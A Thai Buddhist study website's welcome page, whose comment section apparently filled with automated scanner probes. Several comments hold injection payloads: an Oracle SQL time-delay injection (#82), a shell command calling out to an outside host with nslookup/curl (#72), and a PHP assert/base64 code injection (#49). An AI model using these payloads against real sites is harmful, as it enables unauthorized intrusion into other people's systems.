สนทนาทักทาย

ยินดีต้อนรับ ท่านผู้แวะมาเยี่ยมเยียนทุกท่านนะครับ
เว๊บไซต์นี้ได้จัดทำขึ้นเพื่อเป็นอีกช่องทางหนึ่งในการเผยแพร่พระสัทธรรม
โดยยึดหลักตาม พระไตรปิฎก อรรถกถา ฎีกา และคำสอนของครูบาอาจารย์ที่ถูกต้องดีงาม

ในช่วงแรกนี้ ก็จะเริ่มนำ คู่มือพระอภิธัมมัตถสังคหะ มาลงก่อนโดยจัดให้เปิดอ่านได้ง่าย

สะดวกรวดเร็ว และจะจัดทำแผนภาพเพื่อประกอบการศึกษาพระอภิธรรมมาทยอยลงไว้

 

อีกส่วนหนึ่งก็จะได้นำ หนังสือ บาลีไวยากรณ์เบื้องต้น มาจัดลงไว้ พร้อมทั้งมี MP3

ฟังบรรยายประกอบการศึกษาไว้ด้วย

 

Thepathofpurity

Comments: 85
 • #85

  CpjJwWHV (Saturday, 29 June 2024 06:34)

  20

 • #84

  CpjJwWHV (Saturday, 29 June 2024 06:33)

  20

 • #83

  CpjJwWHV (Saturday, 29 June 2024 06:32)

  20

 • #82

  CpjJwWHV'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' (Saturday, 29 June 2024 06:32)

  20

 • #81

  CpjJwWHV (Saturday, 29 June 2024 06:31)

  20

 • #80

  CpjJwWHV (Saturday, 29 June 2024 06:30)

  20

 • #79

  CpjJwWHV (Saturday, 29 June 2024 06:30)

  20

 • #78

  CpjJwWHV (Saturday, 29 June 2024 06:29)

  20

 • #77

  CpjJwWHV (Saturday, 29 June 2024 06:29)

  20

 • #76

  CpjJwWHV (Saturday, 29 June 2024 06:28)

  20

 • #75

  CpjJwWHV (Saturday, 29 June 2024 06:28)

  20

 • #74

  CpjJwWHV (Saturday, 29 June 2024 06:28)

  20

 • #73

  CpjJwWHV (Saturday, 29 June 2024 06:28)

  20

 • #72

  $(nslookup -q=cname hitmobniglwik050db.bxss.me||curl hitmobniglwik050db.bxss.me) (Saturday, 29 June 2024 06:28)

  20

 • #71

  CpjJwWHV (Saturday, 29 June 2024 06:27)

  20

 • #70

  CpjJwWHV (Saturday, 29 June 2024 06:27)

  20

 • #69

  CpjJwWHV (Saturday, 29 June 2024 06:26)

  20

 • #68

  CpjJwWHV (Saturday, 29 June 2024 06:26)

  20

 • #67

  CpjJwWHV (Saturday, 29 June 2024 06:26)

  20

 • #66

  CpjJwWHV (Saturday, 29 June 2024 06:25)

  20

 • #65

  CpjJwWHV (Saturday, 29 June 2024 06:25)

  20

 • #64

  CpjJwWHV (Saturday, 29 June 2024 06:25)

  20

 • #63

  CpjJwWHV (Saturday, 29 June 2024 06:25)

  20

 • #62

  CpjJwWHV (Saturday, 29 June 2024 06:25)

  20

 • #61

  CpjJwWHV (Saturday, 29 June 2024 06:25)

  20

 • #60

  CpjJwWHV (Saturday, 29 June 2024 06:25)

  20

 • #59

  CpjJwWHV (Saturday, 29 June 2024 06:24)

  20

 • #58

  CpjJwWHV (Saturday, 29 June 2024 06:23)

  20

 • #57

  CpjJwWHV (Saturday, 29 June 2024 05:58)

  20

 • #56

  CpjJwWHV (Saturday, 29 June 2024 05:35)

  20

 • #55

  CpjJwWHV (Saturday, 29 June 2024 05:25)

  20

 • #54

  CpjJwWHV (Saturday, 29 June 2024 05:24)

  20

 • #53

  CpjJwWHV (Saturday, 29 June 2024 05:24)

  20

 • #52

  CpjJwWHV (Saturday, 29 June 2024 05:23)

  20

 • #51

  CpjJwWHV (Saturday, 29 June 2024 05:23)

  20

 • #50

  CpjJwWHV (Saturday, 29 June 2024 05:23)

  20

 • #49

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); (Saturday, 29 June 2024 05:23)

  20

 • #48

  CpjJwWHV (Saturday, 29 June 2024 05:23)

  20

 • #47

  CpjJwWHV (Saturday, 29 June 2024 05:22)

  20

 • #46

  CpjJwWHV (Saturday, 29 June 2024 05:22)

  20

 • #45

  CpjJwWHV (Saturday, 29 June 2024 05:22)

  20

 • #44

  CpjJwWHV (Saturday, 29 June 2024 05:22)

  20

 • #43

  CpjJwWHV (Saturday, 29 June 2024 05:22)

  )

 • #42

  CpjJwWHV (Saturday, 29 June 2024 05:22)

  20

 • #41

  CpjJwWHV (Saturday, 29 June 2024 05:22)

  20

 • #40

  CpjJwWHV (Saturday, 29 June 2024 05:22)

  20

 • #39

  CpjJwWHV (Saturday, 29 June 2024 05:22)

  20

 • #38

  CpjJwWHV (Saturday, 29 June 2024 05:17)

  20

 • #37

  tsSLAueP (Friday, 22 March 2024 21:58)

  20

 • #36

  tsSLAueP (Friday, 22 March 2024 18:43)

  20